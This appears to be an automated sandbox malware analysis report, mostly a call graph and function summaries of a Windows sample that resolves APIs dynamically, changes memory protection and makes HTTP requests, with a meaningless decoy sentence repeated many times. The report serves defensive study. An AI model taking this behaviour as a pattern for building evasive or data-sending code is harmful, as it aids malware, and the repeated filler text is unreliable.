18430b 37409->37410 37411 184610 2 API calls 37410->37411 37412 184324 37411->37412 37413 184610 2 API calls 37412->37413 37414 18433d 37413->37414 37415 184610 2 API calls 37414->37415 37416 184356 37415->37416 37417 184610 2 API calls 37416->37417 37418 18436f 37417->37418 37419 184610 2 API calls 37418->37419 37420 184388 37419->37420 37421 184610 2 API calls 37420->37421 37422 1843a1 37421->37422 37423 184610 2 API calls 37422->37423 37424 1843ba 37423->37424 37425 184610 2 API calls 37424->37425 37426 1843d3 37425->37426 37427 184610 2 API calls 37426->37427 37428 1843ec 37427->37428 37429 184610 2 API calls 37428->37429 37430 184405 37429->37430 37431 184610 2 API calls 37430->37431 37432 18441e 37431->37432 37433 184610 2 API calls 37432->37433 37434 184437 37433->37434 37435 184610 2 API calls 37434->37435 37436 184450 37435->37436 37437 184610 2 API calls 37436->37437 37438 184469 37437->37438 37439 184610 2 API calls 37438->37439 37440 184482 37439->37440 37441 184610 2 API calls 37440->37441 37442 18449b 37441->37442 37443 184610 2 API calls 37442->37443 37444 1844b4 37443->37444 37445 184610 2 API calls 37444->37445 37446 1844cd 37445->37446 37447 184610 2 API calls 37446->37447 37448 1844e6 37447->37448 37449 184610 2 API calls 37448->37449 37450 1844ff 37449->37450 37451 184610 2 API calls 37450->37451 37452 184518 37451->37452 37453 184610 2 API calls 37452->37453 37454 184531 37453->37454 37455 184610 2 API calls 37454->37455 37456 18454a 37455->37456 37457 184610 2 API calls 37456->37457 37458 184563 37457->37458 37459 184610 2 API calls 37458->37459 37460 18457c 37459->37460 37461 184610 2 API calls 37460->37461 37462 184595 37461->37462 37463 184610 2 API calls 37462->37463 37464 1845ae 37463->37464 37465 184610 2 API calls 37464->37465 37466 1845c7 37465->37466 37467 184610 2 API calls 37466->37467 37468 1845e0 37467->37468 37469 184610 2 API calls 37468->37469 37470 1845f9 37469->37470 37471 199f20 37470->37471 37472 199f30 43 API calls 37471->37472 37473 19a346 8 API calls 37471->37473 37472->37473 37474 19a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37473->37474 37475 19a456 37473->37475 37474->37475 37476 19a463 8 API calls 37475->37476 37477 19a526 37475->37477 37476->37477 37478 19a5a8 37477->37478 37479 19a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37477->37479 37480 19a5b5 6 API calls 37478->37480 37481 19a647 37478->37481 37479->37478 37480->37481 37482 19a72f 37481->37482 37483 19a654 9 API calls 37481->37483 37484 19a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37482->37484 37485 19a7b2 37482->37485 37483->37482 37484->37485 37486 19a7bb GetProcAddress GetProcAddress 37485->37486 37487 19a7ec 37485->37487 37486->37487 37488 19a825 37487->37488 37489 19a7f5 GetProcAddress GetProcAddress 37487->37489 37490 19a922 37488->37490 37491 19a832 10 API calls 37488->37491 37489->37488 37492 19a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37490->37492 37493 19a98d 37490->37493 37491->37490 37492->37493 37494 19a9ae 37493->37494 37495 19a996 GetProcAddress 37493->37495 37496 195ef3 37494->37496 37497 19a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37494->37497 37495->37494 37498 181590 37496->37498 37497->37496 37768 1816b0 37498->37768 37501 19aab0 lstrcpy 37502 1815b5 37501->37502 37503 19aab0 lstrcpy 37502->37503 37504 1815c7 37503->37504 37505 19aab0 lstrcpy 37504->37505 37506 1815d9 37505->37506 37507 19aab0 lstrcpy 37506->37507 37508 181663 37507->37508 37509 195760 37508->37509 37510 195771 37509->37510 37511 19ab30 2 API calls 37510->37511 37512 19577e 37511->37512 37513 19ab30 2 API calls 37512->37513 37514 19578b 37513->37514 37515 19ab30 2 API calls 37514->37515 37516 195798 37515->37516 37517 19aa50 lstrcpy 37516->37517 37518 1957a5 37517->37518 37519 19aa50 lstrcpy 37518->37519 37520 1957b2 37519->37520 37521 19aa50 lstrcpy 37520->37521 37522 1957bf 37521->37522 37523 19aa50 lstrcpy 37522->37523 37524 1957cc 37523->37524 37525 195893 StrCmpCA 37524->37525 37526 1958f0 StrCmpCA 37524->37526 37529 181590 lstrcpy 37524->37529 37532 195aa6 StrCmpCA 37524->37532 37535 19aab0 lstrcpy 37524->37535 37541 19aa50 lstrcpy 37524->37541 37542 19ab30 lstrlen lstrcpy 37524->37542 37544 195c5b StrCmpCA 37524->37544 37555 195510 25 API calls 37524->37555 37558 1959da StrCmpCA 37524->37558 37561 195b8f StrCmpCA 37524->37561 37562 195440 20 API calls 37524->37562 37563 19abb0 lstrcpy 37524->37563 37525->37524 37526->37524 37527 195a2c 37526->37527 37528 19abb0 lstrcpy 37527->37528 37530 195a38 37528->37530 37529->37524 37531 19ab30 2 API calls 37530->37531 37533 195a46 37531->37533 37532->37524 37534 195be1 37532->37534 37536 19ab30 2 API calls 37533->37536 37538 19abb0 lstrcpy 37534->37538 37535->37524 37537 195a55 37536->37537 37539 1816b0 lstrcpy 37537->37539 37540 195bed 37538->37540 37560 195a61 37539->37560 37543 19ab30 2 API calls 37540->37543 37541->37524 37542->37524 37545 195bfb 37543->37545 37547 195c78 37544->37547 37548 195c66 Sleep 37544->37548 37546 19ab30 2 API calls 37545->37546 37549 195c0a 37546->37549 37550 19abb0 lstrcpy 37547->37550 37548->37524 37551 1816b0 lstrcpy 37549->37551 37552 195c84 37550->37552 37551->37560 37553 19ab30 2 API calls 37552->37553 37554 195c93 37553->37554 37556 19ab30 2 API calls 37554->37556 37555->37524 37557 195ca2 37556->37557 37559 1816b0 lstrcpy 37557->37559 37558->37524 37559->37560 37560->36616 37561->37524 37562->37524 37563->37524 37565 1976dc 37564->37565 37566 1976e3 GetVolumeInformationA 37564->37566 37565->37566 37567 197721 37566->37567 37568 19778c GetProcessHeap RtlAllocateHeap 37567->37568 37569 1977a9 37568->37569 37570 1977b8 wsprintfA 37568->37570 37571 19aa50 lstrcpy 37569->37571 37572 19aa50 lstrcpy 37570->37572 37573 195ff7 37571->37573 37572->37573 37573->36637 37575 19aab0 lstrcpy 37574->37575 37576 1848e9 37575->37576 37777 184800 37576->37777 37578 1848f5 37579 19aa50 lstrcpy 37578->37579 37580 184927 37579->37580 37581 19aa50 lstrcpy 37580->37581 37582 184934 37581->37582 37583 19aa50 lstrcpy 37582->37583 37584 184941 37583->37584 37585 19aa50 lstrcpy 37584->37585 37586 18494e 37585->37586 37587 19aa50 lstrcpy 37586->37587 37588 18495b InternetOpenA StrCmpCA 37587->37588 37589 184994 37588->37589 37590 184f1b InternetCloseHandle 37589->37590 37783 198cf0 37589->37783 37592 184f38 37590->37592 37798 18a210 CryptStringToBinaryA 37592->37798 37593 1849b3 37791 19ac30 37593->37791 37597 1849c6 37598 19abb0 lstrcpy 37597->37598 37603 1849cf 37598->37603 37599 19ab30 2 API calls 37600 184f55 37599->37600 37601 19acc0 4 API calls 37600->37601 37604 184f6b 37601->37604 37602 184f77 codecvt 37605 19aab0 lstrcpy 37602->37605 37607 19acc0 4 API calls 37603->37607 37606 19abb0 lstrcpy 37604->37606 37618 184fa7 37605->37618 37606->37602 37608 1849f9 37607->37608 37609 19abb0 lstrcpy 37608->37609 37610 184a02 37609->37610 37611 19acc0 4 API calls 37610->37611 37612 184a21 37611->37612 37613 19abb0 lstrcpy 37612->37613 37614 184a2a 37613->37614 37615 19ac30 3 API calls 37614->37615 37616 184a48 37615->37616 37617 19abb0 lstrcpy 37616->37617 37619 184a51 37617->37619 37618->36640 37620 19acc0 4 API calls 37619->37620 37621 184a70 37620->37621 37622 19abb0 lstrcpy 37621->37622 37623 184a79 37622->37623 37624 19acc0 4 API calls 37623->37624 37625 184a98 37624->37625 37626 19abb0 lstrcpy 37625->37626 37627 184aa1 37626->37627 37628 19acc0 4 API calls 37627->37628 37629 184acd 37628->37629 37630 19ac30 3 API calls 37629->37630 37631 184ad4 37630->37631 37632 19abb0 lstrcpy 37631->37632 37633 184add 37632->37633 37634 184af3 InternetConnectA 37633->37634 37634->37590 37635 184b23 HttpOpenRequestA 37634->37635 37637 184b78 37635->37637 37638 184f0e InternetCloseHandle 37635->37638 37639 19acc0 4 API calls 37637->37639 37638->37590 37640 184b8c 37639->37640 37641 19abb0 lstrcpy 37640->37641 37642 184b95 37641->37642 37643 19ac30 3 API calls 37642->37643 37644 184bb3 37643->37644 37645 19abb0 lstrcpy 37644->37645 37646 184bbc 37645->37646 37647 19acc0 4 API calls 37646->37647 37648 184bdb 37647->37648 37649 19abb0 lstrcpy 37648->37649 37650 184be4 37649->37650 37651 19acc0 4 API calls 37650->37651 37652 184c05 37651->37652 37653 19abb0 lstrcpy 37652->37653 37654 184c0e 37653->37654 37655 19acc0 4 API calls 37654->37655 37656 184c2e 37655->37656 37657 19abb0 lstrcpy 37656->37657 37658 184c37 37657->37658 37659 19acc0 4 API calls 37658->37659 37660 184c56 37659->37660 37661 19abb0 lstrcpy 37660->37661 37662 184c5f 37661->37662 37663 19ac30 3 API calls 37662->37663 37664 184c7d 37663->37664 37665 19abb0 lstrcpy 37664->37665 37666 184c86 37665->37666 37667 19acc0 4 API calls 37666->37667 37668 184ca5 37667->37668 37669 19abb0 lstrcpy 37668->37669 37670 184cae 37669->37670 37671 19acc0 4 API calls 37670->37671 37672 184ccd 37671->37672 37673 19abb0 lstrcpy 37672->37673 37674 184cd6 37673->37674 37675 19ac30 3 API calls 37674->37675 37676 184cf4 37675->37676 37677 19abb0 lstrcpy 37676->37677 37678 184cfd 37677->37678 37679 19acc0 4 API calls 37678->37679 37680 184d1c 37679->37680 37681 19abb0 lstrcpy 37680->37681 37682 184d25 37681->37682 37683 19acc0 4 API calls 37682->37683 37684 184d46 37683->37684 37685 19abb0 lstrcpy 37684->37685 37686 184d4f 37685->37686 37687 19acc0 4 API calls 37686->37687 37688 184d6f 37687->37688 37689 19abb0 lstrcpy 37688->37689 37690 184d78 37689->37690 37691 19acc0 4 API calls 37690->37691 37692 184d97 37691->37692 37693 19abb0 lstrcpy 37692->37693 37694 184da0 37693->37694 37695 19ac30 3 API calls 37694->37695 37696 184dbe 37695->37696 37697 19abb0 lstrcpy 37696->37697 37698 184dc7 37697->37698 37699 19aa50 lstrcpy 37698->37699 37700 184de2 37699->37700 37701 19ac30 3 API calls 37700->37701 37702 184e03 37701->37702 37703 19ac30 3 API calls 37702->37703 37704 184e0a 37703->37704 37705 19abb0 lstrcpy 37704->37705 37706 184e16 37705->37706 37707 184e37 lstrlen 37706->37707 37708 184e4a 37707->37708 37709 184e53 lstrlen 37708->37709 37797 19ade0 37709->37797 37711 184e63 HttpSendRequestA 37712 184e82 InternetReadFile 37711->37712 37713 184eb7 InternetCloseHandle 37712->37713 37718 184eae 37712->37718 37716 19ab10 37713->37716 37715 19acc0 4 API calls 37715->37718 37716->37638 37717 19abb0 lstrcpy 37717->37718 37718->37712 37718->37713 37718->37715 37718->37717 37804 19ade0 37719->37804 37721 191a14 StrCmpCA 37722 191a1f ExitProcess 37721->37722 37724 191a27 37721->37724 37723 191c12 37723->36642 37724->37723 37725 191afd StrCmpCA 37724->37725 37726 191b1f StrCmpCA 37724->37726 37727 191aad StrCmpCA 37724->37727 37728 191acf StrCmpCA 37724->37728 37729 191b41 StrCmpCA 37724->37729 37730 191ba1 StrCmpCA 37724->37730 37731 191bc0 StrCmpCA 37724->37731 37732 191b63 StrCmpCA 37724->37732 37733 191b82 StrCmpCA 37724->37733 37734 19ab30 lstrlen lstrcpy 37724->37734 37725->37724 37726->37724 37727->37724 37728->37724 37729->37724 37730->37724 37731->37724 37732->37724 37733->37724 37734->37724 37735->36648 37736->36650 37737->36656 37738->36658 37739->36664 37740->36666 37741->36670 37742->36674 37743->36678 37744->36684 37745->36686 37746->36690 37747->36704 37748->36708 37749->36707 37750->36703 37751->36707 37752->36725 37753->36710 37754->36712 37755->36716 37756->36721 37757->36722 37758->36728 37759->36735 37760->36737 37761->36760 37762->36764 37763->36765 37764->36761 37765->36765 37766->36774 37769 19aab0 lstrcpy 37768->37769 37770 1816c3 37769->37770 37771 19aab0 lstrcpy 37770->37771 37772 1816d5 37771->37772 37773 19aab0 lstrcpy 37772->37773 37774 1816e7 37773->37774 37775 19aab0 lstrcpy 37774->37775 37776 1815a3 37775->37776 37776->37501 37778 184816 37777->37778 37779 184888 lstrlen 37778->37779 37803 19ade0 37779->37803 37781 184898 InternetCrackUrlA 37782 1848b7 37781->37782 37782->37578 37784 19aa50 lstrcpy 37783->37784 37785 198d04 37784->37785 37786 19aa50 lstrcpy 37785->37786 37787 198d12 GetSystemTime 37786->37787 37789 198d29 37787->37789 37788 19aab0 lstrcpy 37790 198d8c 37788->37790 37789->37788 37790->37593 37792 19ac41 37791->37792 37793 19ac98 37792->37793 37795 19ac78 lstrcpy lstrcat 37792->37795 37794 19aab0 lstrcpy 37793->37794 37796 19aca4 37794->37796 37795->37793 37796->37597 37797->37711 37799 18a249 LocalAlloc 37798->37799 37800 184f3e 37798->37800 37799->37800 37801 18a264 CryptStringToBinaryA 37799->37801 37800->37599 37800->37602 37801->37800 37802 18a289 LocalFree 37801->37802 37802->37800 37803->37781 37804->37721

                                        Executed Functions

                                        Function 00199BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 199bb0-199bc4 call 199aa0 663 199bca-199dde call 199ad0 GetProcAddress * 21 660->663 664 199de3-199e42 LoadLibraryA * 5 660->664 663->664 666 199e5d-199e64 664->666 667 199e44-199e58 GetProcAddress 664->667 669 199e96-199e9d 666->669 670 199e66-199e91 GetProcAddress * 2 666->670 667->666 671 199eb8-199ebf 669->671 672 199e9f-199eb3 GetProcAddress 669->672 670->669 673 199ed9-199ee0 671->673 674 199ec1-199ed4 GetProcAddress 671->674 672->671 675 199f11-199f12 673->675 676 199ee2-199f0c GetProcAddress * 2 673->676 674->673 676->675
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,011C2398), ref: 00199BF1
                                        • GetProcAddress.KERNEL32(74DD0000,011C2338), ref: 00199C0A
                                        • GetProcAddress.KERNEL32(74DD0000,011C2410), ref: 00199C22
                                        • GetProcAddress.KERNEL32(74DD0000,011C2500), ref: 00199C3A
                                        • GetProcAddress.KERNEL32(74DD0000,011C22F0), ref: 00199C53
                                        • GetProcAddress.KERNEL32(74DD0000,011C8FB8), ref: 00199C6B
                                        • GetProcAddress.KERNEL32(74DD0000,011B5810), ref: 00199C83
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 00199C9C
                                        • GetProcAddress.KERNEL32(74DD0000,011C2428), ref: 00199CB4
                                        • GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 00199CCC
                                        • GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 00199CE5
                                        • GetProcAddress.KERNEL32(74DD0000,011C23B0), ref: 00199CFD
                                        • GetProcAddress.KERNEL32(74DD0000,011B59B0), ref: 00199D15
                                        • GetProcAddress.KERNEL32(74DD0000,011C2470), ref: 00199D2E
                                        • GetProcAddress.KERNEL32(74DD0000,011C2458), ref: 00199D46
                                        • GetProcAddress.KERNEL32(74DD0000,011B5770), ref: 00199D5E
                                        • GetProcAddress.KERNEL32(74DD0000,011C2488), ref: 00199D77
                                        • GetProcAddress.KERNEL32(74DD0000,011C24A0), ref: 00199D8F
                                        • GetProcAddress.KERNEL32(74DD0000,011B5970), ref: 00199DA7
                                        • GetProcAddress.KERNEL32(74DD0000,011C2230), ref: 00199DC0
                                        • GetProcAddress.KERNEL32(74DD0000,011B5750), ref: 00199DD8
                                        • LoadLibraryA.KERNEL32(011C25D8,?,00196CA0), ref: 00199DEA
                                        • LoadLibraryA.KERNEL32(011C2590,?,00196CA0), ref: 00199DFB
                                        • LoadLibraryA.KERNEL32(011C25C0,?,00196CA0), ref: 00199E0D
                                        • LoadLibraryA.KERNEL32(011C25A8,?,00196CA0), ref: 00199E1F
                                        • LoadLibraryA.KERNEL32(011C2518,?,00196CA0), ref: 00199E30
                                        • GetProcAddress.KERNEL32(75A70000,011C2530), ref: 00199E52
                                        • GetProcAddress.KERNEL32(75290000,011C2560), ref: 00199E73
                                        • GetProcAddress.KERNEL32(75290000,011C2548), ref: 00199E8B
                                        • GetProcAddress.KERNEL32(75BD0000,011C2578), ref: 00199EAD
                                        • GetProcAddress.KERNEL32(75450000,011B5710), ref: 00199ECE
                                        • GetProcAddress.KERNEL32(76E90000,011C90C8), ref: 00199EEF
                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00199F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00199EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 294e32d9c059f9665ddb54a544d1eb9b04ee553e597cfdeea8c6189327210dca
                                        • Instruction ID: d72efc3365a72cc1d62b0d8ce138472b8eda49e451a7fa0da422d078f6fe2c5b
                                        • Opcode Fuzzy Hash: 294e32d9c059f9665ddb54a544d1eb9b04ee553e597cfdeea8c6189327210dca
                                        • Instruction Fuzzy Hash: F0A11AB5518700AFC384DFA8FC889567BB9A749703B51867AB909C3772DB34E940CF68
                                        Function 00184610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 184610-1846e5 RtlAllocateHeap 781 1846f0-1846f6 764->781 782 1846fc-18479a 781->782 783 18479f-1847f9 VirtualProtect 781->783 782->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0018465F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001847EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184779
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846C8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846BD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184728
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018462D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 